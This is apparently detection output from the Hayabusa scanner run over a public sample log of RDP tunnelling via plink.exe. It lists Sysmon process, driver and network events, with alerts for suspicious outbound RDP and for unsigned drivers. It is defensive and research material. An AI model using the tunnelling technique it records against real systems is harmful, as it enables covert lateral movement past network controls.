2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.962 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49187 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49187 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\vga.dll | Status: Valid | Hash: SHA1=00F4056FD5FE28EC255B4521EE18C700BCF9CEEB,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\vga.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\TSTheme.exe -Embedding | Process: C:\Windows\System32\TSTheme.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x26656 | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:06.410 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:06.971 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\TSTheme.exe | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:5355 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 
365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (PC01.example.corp) | Dst: 10.0.2.18:137 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49184 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: PC01\IEUser | Parent Cmd: winlogon.exe | LID: 0x26656 | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 
2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\AtBroker.exe | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:63309 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 
365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:62259 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49185 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:59302 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 
() | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:61049 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49186 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:52122 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 
2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:55679 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:64257 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49187 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 
+09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:02.311 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49188 (PC01.example.corp) | Dst: 10.0.2.18:5357 (PC02) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:02.561 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 127.0.0.1:3702 (PC01.example.corp) | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49189 (PC01.example.corp) | Dst: 127.0.0.1:5357 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:5357 (PC01.example.corp) | Dst: 127.0.0.1:49189 (PC01.example.corp) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
